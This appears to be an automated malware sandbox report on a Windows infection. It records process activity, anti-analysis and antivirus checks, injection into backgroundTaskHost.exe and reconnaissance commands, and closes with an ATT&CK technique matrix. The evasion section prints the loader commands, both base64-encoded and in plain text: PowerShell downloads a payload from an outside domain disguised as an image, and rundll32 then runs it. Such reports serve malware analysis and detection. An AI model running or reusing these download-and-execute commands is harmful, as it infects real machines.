          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\whoami.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\whoami.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: backgroundTaskHost.exe, 0000000E.00000003.5843305920.00000000045BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status from Win32_PnPEntity
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\ntdll.dllJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDrive
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_Bios
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2804Thread sleep count: 7543 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2792Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 404Thread sleep count: 8791 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1444Thread sleep count: 142 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 5168Thread sleep time: -149000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exe TID: 7316Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7543Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8791Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-37689
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_ComputerSystem
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\catroot2Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\en-US\tzres.dll.muiJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\eed480a49b61c30993f5872af5a0685e\Microsoft.PowerShell.Security.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dllJump to behavior
          Source: ARP.EXE, 00000017.00000002.8020169347.0000000002A47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
          Source: NETSTAT.EXE, 00000020.00000002.8034593703.000000000327A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
          Source: net1.exe, 00000024.00000002.8037578363.0000000002BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
          Source: ROUTE.EXE, 0000001E.00000002.8031561499.0000000003378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: net1.exe, 00000024.00000002.8037578363.0000000002BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000AFB9 GetSystemInfo,13_2_1000AFB9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000C547 FindFirstFileW,FindNextFileW,13_2_1000C547
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000970D LoadLibraryA,GetProcAddress,13_2_1000970D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_3_043B222E mov eax, dword ptr fs:[00000030h]13_3_043B222E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_693417F4 mov eax, dword ptr fs:[00000030h]13_2_693417F4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100010A0 mov eax, dword ptr fs:[00000030h]13_2_100010A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_100026E5 mov eax, dword ptr fs:[00000030h]13_2_100026E5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\whoami.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\whoami.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\whoami.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_693720E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,13_2_693720E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_693720DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,13_2_693720DC

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\backgroundTaskHost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 28A0000 protect: page read and writeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 28A0000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\backgroundTaskHost.exe base: 201790Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl3rhc3nvaw5tb2jpbglhcmlhlmnvbs81nkcwlzaxlmdpziatt3v0rmlszsbdolxwcm9ncmftzgf0yvxwdxr0es5qcgcncnj1bmrsbdmyiem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzyxxaw5kdqplegl0dqo='))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('dqpazwnobybvzmyncnbvd2vyc2hlbgwgsw52b2tllvdlyljlcxvlc3qglvvsssbodhrwczovl3rhc3nvaw5tb2jpbglhcmlhlmnvbs81nkcwlzaxlmdpziatt3v0rmlszsbdolxwcm9ncmftzgf0yvxwdxr0es5qcgcncnj1bmrsbdmyiem6xhbyb2dyyw1kyxrhxhb1dhr5lmpwzyxxaw5kdqplegl0dqo=')) Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmdJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -OutFile C:\programdata\putty.jpgJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,WindJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exeJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net viewJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c setJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -aJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /allJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net shareJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route printJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -naoJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\whoami.exe whoami /allJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 shareJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,CoInitializeEx,Sleep,13_2_1000169F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,13_2_10002C5E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,13_2_10012137
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,13_2_1000338F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,13_2_1000FFF2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_69372030 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,13_2_69372030
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000B231 GetCurrentProcessId,GetLastError,GetVersionExA,GetWindowsDirectoryW,13_2_1000B231
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
          Source: rundll32.exe, 0000000D.00000003.5700072270.000000000474F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
          Source: rundll32.exe, 0000000D.00000003.5700072270.000000000474F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
          Source: rundll32.exe, 0000000D.00000003.5700072270.000000000474F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
          Source: rundll32.exe, 0000000D.00000003.5700072270.000000000474F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgcsrvx.exe
          Source: rundll32.exe, 0000000D.00000003.5700072270.000000000474F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcshield.exe
          Source: rundll32.exe, 0000000D.00000003.5700072270.000000000474F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 13.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.rundll32.exe.aed640.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.rundll32.exe.aed640.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.5726437418.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -naoJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 13.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.rundll32.exe.aed640.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.rundll32.exe.aed640.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.5726437418.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts431
          Windows Management Instrumentation
          11
          DLL Side-Loading
          11
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          Credential API Hooking
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts2
          Native API
          1
          Windows Service
          1
          Windows Service
          1
          Software Packing
          LSASS Memory2
          System Network Connections Discovery
          Remote Desktop Protocol1
          Credential API Hooking
          Exfiltration Over Bluetooth11
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Exploitation for Client Execution
          2
          Registry Run Keys / Startup Folder
          311
          Process Injection
          1
          Timestomp
          Security Account Manager3
          File and Directory Discovery
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          Command and Scripting Interpreter
          Logon Script (Mac)2
          Registry Run Keys / Startup Folder
          11
          DLL Side-Loading
          NTDS436
          System Information Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer14
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud Accounts1
          Service Execution
          Network Logon ScriptNetwork Logon Script11
          Masquerading
          LSA Secrets541
          Security Software Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable Media2
          PowerShell
          Rc.commonRc.common341
          Virtualization/Sandbox Evasion
          Cached Domain Credentials341
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items311
          Process Injection
          DCSync2
          Process Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Rundll32
          Proc Filesystem1
          Application Window Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
          Remote System Discovery
          Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing4
          System Network Configuration Discovery
          Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
